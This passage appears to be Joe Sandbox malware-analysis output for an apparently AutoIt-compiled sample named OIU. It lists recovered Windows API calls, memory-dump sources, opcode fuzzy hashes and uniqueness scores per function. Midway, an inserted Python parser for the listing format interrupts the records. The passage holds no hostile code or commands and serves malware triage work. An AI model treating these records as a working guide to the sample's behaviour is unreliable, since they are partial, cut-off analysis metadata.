                                                                      • Opcode Fuzzy Hash: 331a431b93b247596c551ddac7e9eed140ab169b56fc607aa9faf29cb7cb803d
                                                                      • Instruction Fuzzy Hash: 7431E4352042A19FCB10CF68D485FA977E0EF54318F248099E8258BB92CB79DF41C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C34705
                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C34713
                                                                      • DestroyWindow.USER32 ref: 00C3471A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 4014797782-2298589950
                                                                      • Opcode ID: e9dd0a124faf54cdd79805f33bcd5ded5f451ced5822efc2a68a74c70c4d6fbb
                                                                      • Instruction ID: 9ae51823dabf94eee500964f8eb16bc3e2515e1b8795ae1c3cb4a3194380a4ff
                                                                      • Opcode Fuzzy Hash: e9dd0a124faf54cdd79805f33bcd5ded5f451ced5822efc2a68a74c70c4d6fbb
                                                                      • Instruction Fuzzy Hash: FB215CB5610208AFDB14DF68DCD1EAB37ADEB5A3A4B040059FA149B291CB70FD51CA60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 176396367-2734436370
                                                                      • Opcode ID: 251458b8635a2b69b3e2f71d0cfdfec197eac90a0808d7c5b498fc490a270542
                                                                      • Instruction ID: ef4fe21b12cf4fc87903da8a633e737f738678e5b29aba922b1daeb99915007f
                                                                      • Opcode Fuzzy Hash: 251458b8635a2b69b3e2f71d0cfdfec197eac90a0808d7c5b498fc490a270542
                                                                      • Instruction Fuzzy Hash: 2D212B72208511A7D731BB299C02FB773D8DF55310F14442AF959971C3EBB29E41D2D5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C33840
                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C33850
                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00C33876
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MoveWindow
                                                                      • String ID: Listbox
                                                                      • API String ID: 3315199576-2633736733
                                                                      • Opcode ID: 663084757383357f7672f216179744eab3d5ffd790660410bb8be62a0d1c101c
                                                                      • Instruction ID: 5e6e4831bd33944cce6628fc16a0b50c54dfd4668558bc5abaaf25e16aab5c33
                                                                      • Opcode Fuzzy Hash: 663084757383357f7672f216179744eab3d5ffd790660410bb8be62a0d1c101c
                                                                      • Instruction Fuzzy Hash: F421CF72620218BBEF218F54CC85FBF376EEF8A764F118125FA149B190C671DD528BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C14A08
                                                                      • GetVolumeInformationW.KERNEL32 ref: 00C14A5C
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00C3CC08), ref: 00C14AD0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: a7bf450651168278c408253d37933115a443018dbb2ee250994358b2d379398e
                                                                      • Instruction ID: 2272b1026f7e20fcf683b5f03194e8c16eced6a656ebdbe8204faf4e49850ba0
                                                                      • Opcode Fuzzy Hash: a7bf450651168278c408253d37933115a443018dbb2ee250994358b2d379398e
                                                                      • Instruction Fuzzy Hash: 70319175A00109AFDB10DF54C881EAE7BF8EF09308F1480A5F909EB252D771EE45DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C3424F
                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C34264
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C34271
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: cbd858fbd2eaa24ac50818df3775eaea653e1b72237b6adcc4de7fca7c92f9b7
                                                                      • Instruction ID: 9e814899e714897025e89921477b00a6a0d3dfa114b063c9e283c74935c8c42d
                                                                      • Opcode Fuzzy Hash: cbd858fbd2eaa24ac50818df3775eaea653e1b72237b6adcc4de7fca7c92f9b7
                                                                      • Instruction Fuzzy Hash: CB11C671250248BFEF205F69CC46FAB3BACEF95B54F110524FA55E60A0D672EC519B10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                        • Part of subcall function 00C02DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C02DC5
                                                                        • Part of subcall function 00C02DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C02DD6
                                                                        • Part of subcall function 00C02DA7: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00C02DDD
                                                                        • Part of subcall function 00C02DA7: AttachThreadInput.USER32(00000000,?,00000000), ref: 00C02DE4
                                                                      • GetFocus.USER32 ref: 00C02F78
                                                                        • Part of subcall function 00C02DEE: GetParent.USER32(00000000), ref: 00C02DF9
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00C02FC3
                                                                      • EnumChildWindows.USER32 ref: 00C02FEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                      • String ID: %s%d
                                                                      • API String ID: 1272988791-1110647743
                                                                      • Opcode ID: eec4165bb7ae141b7d65f1d4dd3a49746c7a807b852d9c6a380d478e29bac77f
                                                                      • Instruction ID: b4b8ecb6d6a6aa27dd643aed4bba8b6e797467d2c396abcb1e52b458dd443ce4
                                                                      • Opcode Fuzzy Hash: eec4165bb7ae141b7d65f1d4dd3a49746c7a807b852d9c6a380d478e29bac77f
                                                                      • Instruction Fuzzy Hash: 0C1172716002056BCF157F649CCAFED77AAAF95304F044075BA09AB192DE709A45DB70
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$InfoItem$Draw
                                                                      • String ID: 0
                                                                      • API String ID: 3227129158-4108050209
                                                                      • Opcode ID: 5e3c253e9910894584ea22bec9a93081a51a5a58d43f25319acae596e5e1b2df
                                                                      • Instruction ID: 30e101c444470bae442b3506fbc3b6b9aa4b6d27a737faba03fcee13a4a619f5
                                                                      • Opcode Fuzzy Hash: 5e3c253e9910894584ea22bec9a93081a51a5a58d43f25319acae596e5e1b2df
                                                                      • Instruction Fuzzy Hash: 18016972520218EFDB219F21DC44BFEBBB4FB45360F1080A9E849E6151DB708A95EF21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32( =,00C71884,?,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC024D
                                                                      • LeaveCriticalSection.KERNEL32( =,?,00BB198B,00C72518,?,?,?,00BA12F9,00000000), ref: 00BC028A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID: =
                                                                      • API String ID: 3168844106-1905332926
                                                                      • Opcode ID: 4332d10ae5061f3ec4923549eeb334cd0350acb96e8d95c3a433a99ee1b3b970
                                                                      • Instruction ID: c4553bae09b254b1844e3ba603a558c0e60c30939b12502ead2524366147a844
                                                                      • Opcode Fuzzy Hash: 4332d10ae5061f3ec4923549eeb334cd0350acb96e8d95c3a433a99ee1b3b970
                                                                      • Instruction Fuzzy Hash: C1F08235614205DFC724AF54D888F2A77E8FB45B31F24026DE5595B2D1C7711841DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00BFD3BF
                                                                      • FreeLibrary.KERNEL32 ref: 00BFD3E5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                      • API String ID: 3013587201-2590602151
                                                                      • Opcode ID: 26eba1617530efadedc704099b96bbff56f097d0d52f77b1a0939bc82807726e
                                                                      • Instruction ID: 767de14f08b4e44d912c147f8d49315c5cdf8d0b5c2ce64b0e4083477a5f108a
                                                                      • Opcode Fuzzy Hash: 26eba1617530efadedc704099b96bbff56f097d0d52f77b1a0939bc82807726e
                                                                      • Instruction Fuzzy Hash: 19E04F7290252A9BD6715710CCD4BBE72E5AF10B01F8445D4FA02F7148EB64CD086BD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

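The records above are Joe Sandbox's per-function IDA plugin output: the API calls recovered from one function in the 00BA0000 memory dump, the dump files it was lifted from, and the Similarity identifiers (API ID, String ID, Opcode Fuzzy Hash) that let the same function be recognised in another report. The parser below is an added example, not code from the Joe Sandbox report or from Joe Security; it reads that listing format into structured records so the Opcode Fuzzy Hash / API ID pairs can be pivoted across reports. The field names are taken from the record layout exactly as shown on this page, the two sample records embedded in it are copied from the listing above (constructed sample input, whitespace trimmed), and the fused "Download File" link label is stripped from the Associated entries as a parsing detail, not as report data.

```python
# Parser for Joe Sandbox per-function IDA plugin records (added example, not report code).
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
# "SendMessageW.USER32(...)" or "Part of subcall function 00C02DA7: GetFocus.USER32 ref: ..."
API_NAME_RE = re.compile(r"^(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_]\w*)\.")
SOURCE_RE = re.compile(r"^Source File:\s*(.+?),\s*Offset:\s*([0-9A-Fa-f]+)")
SCORE_RE = re.compile(r"^Uniqueness Score:\s*(-?[0-9.]+)%")


@dataclass
class FunctionRecord:
    apis: List[str] = field(default_factory=list)         # raw API call lines, in order
    source_file: str = ""                                 # .sdmp the function was lifted from
    image_base: str = ""                                  # "Offset:" value, e.g. 00BA0000
    associated: List[str] = field(default_factory=list)   # other .sdmp dumps of the same image
    fields: Dict[str, str] = field(default_factory=dict)  # Similarity / plugin "key: value" bullets
    uniqueness_score: Optional[float] = None

    def api_names(self) -> List[str]:
        """Bare API names ('SetErrorMode', ...), subcall entries included."""
        return [m.group(1) for m in map(API_NAME_RE.match, self.apis) if m]


def parse_records(text: str) -> List[FunctionRecord]:
    """Split a listing into records; a 'Uniqueness Score:' line closes each record."""
    records: List[FunctionRecord] = []
    current = FunctionRecord()
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        m = SCORE_RE.match(line)
        if m:
            current.uniqueness_score = float(m.group(1))
            records.append(current)
            current, section = FunctionRecord(), None
            continue
        line = line.lstrip("• ").strip()  # drop the bullet glyph
        if section == "APIs":
            current.apis.append(line)
        elif section == "Memory Dump Source":
            src = SOURCE_RE.match(line)
            if src:
                current.source_file, current.image_base = src.group(1), src.group(2)
            elif line.startswith("Associated:"):
                # The web view fuses the "Download File" link label onto the file name.
                name = line[len("Associated:"):].strip()
                if name.endswith("Download File"):
                    name = name[:-len("Download File")].strip()
                current.associated.append(name)
        elif section in ("Similarity", "Joe Sandbox IDA Plugin"):
            key, _, value = line.partition(":")
            current.fields[key.strip()] = value.strip()
    return records


def index_by_opcode_hash(records: List[FunctionRecord]) -> Dict[str, FunctionRecord]:
    """Key records by Opcode Fuzzy Hash so one function can be matched across reports."""
    return {r.fields["Opcode Fuzzy Hash"]: r
            for r in records if r.fields.get("Opcode Fuzzy Hash")}


# Constructed sample: two records copied from the listing above, whitespace trimmed.
SAMPLE = """\
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00C14A08
• GetVolumeInformationW.KERNEL32 ref: 00C14A5C
• SetErrorMode.KERNEL32(00000000,?,?,00C3CC08), ref: 00C14AD0
Strings
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• Opcode Fuzzy Hash: a7bf450651168278c408253d37933115a443018dbb2ee250994358b2d379398e
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00BFD3BF
• FreeLibrary.KERNEL32 ref: 00BFD3E5
Memory Dump Source
• Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
Similarity
• API ID: AddressFreeLibraryProc
• String ID: GetSystemWow64DirectoryW$X64
• Opcode Fuzzy Hash: 26eba1617530efadedc704099b96bbff56f097d0d52f77b1a0939bc82807726e
Uniqueness
Uniqueness Score: -1.00%
"""
```

Calling `parse_records(SAMPLE)` yields two records; `index_by_opcode_hash` keys them by Opcode Fuzzy Hash, which is the field to join on when the same dumped image shows up in a second analysis. The Uniqueness Score is stored as the report prints it (-1.00 here) without interpretation, and an empty section such as the bare "Strings" header simply contributes no entries.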
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ec8244e8bea8500c760ef220877795a57e01db9042bd377f6d45528f157712
                                                                      • Instruction ID: 19abc86af8ad034c24ed1347fc445eee32b25baf650a3249c10215a703b6a5b5
                                                                      • Opcode Fuzzy Hash: a7ec8244e8bea8500c760ef220877795a57e01db9042bd377f6d45528f157712
                                                                      • Instruction Fuzzy Hash: 19C13A75A0020AEFDB15CF94C898BAEB7B5FF48704F218598E515EB2A1D731DE81CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                                      • String ID:
                                                                      • API String ID: 1998397398-0
                                                                      • Opcode ID: 9549218ab875c551bbdbd1cc20a9da0c0a1af0fcec47510423eaaec9b69b3981
                                                                      • Instruction ID: 3dcbd650a6fb7fb3c18eb68a0f105085f8bc764f38018dd97ad255148706a65d
                                                                      • Opcode Fuzzy Hash: 9549218ab875c551bbdbd1cc20a9da0c0a1af0fcec47510423eaaec9b69b3981
                                                                      • Instruction Fuzzy Hash: 39A160756183109FC700EF24D895A2AB7E5FF89710F04889DF99A9B362DB34EE01CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00C005F0
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C00608
                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 00C0062D
                                                                      • _memcmp.LIBVCRUNTIME ref: 00C0064E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                       • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID:
                                                                      • API String ID: 314563124-0
                                                                      • Opcode ID: 516aebedfffae0de8e3e7a69bc0999cca36bc526bdaf91dd576eed002a78fb5c
                                                                      • Instruction ID: 1aeaeb202f84206570ec4f16acc8cf9e971c845cb64d31dd6bfec30c37236a31
                                                                      • Opcode Fuzzy Hash: 516aebedfffae0de8e3e7a69bc0999cca36bc526bdaf91dd576eed002a78fb5c
                                                                      • Instruction Fuzzy Hash: 23810B71A00109EFCB04DF94C984EEEB7B9FF89315F214598F516AB290DB71AE46CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: d398f02e66891cc3ed523394b0565f6f7a17e92b944660fc5cc152522801505f
                                                                      • Instruction ID: 536a211250805b93851b478e081f52b8e4bf64879f4f4193f9b3da644ac8e43d
                                                                      • Opcode Fuzzy Hash: d398f02e66891cc3ed523394b0565f6f7a17e92b944660fc5cc152522801505f
                                                                      • Instruction Fuzzy Hash: 79414D35600591ABDB216BBE8C85FBE3AF5EF41330F344AEAF419D63D2E73448419A61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetWindowRect.USER32(00EB51E0,?), ref: 00C362E2
                                                                      • ScreenToClient.USER32(?,?), ref: 00C36315
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00C36382
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
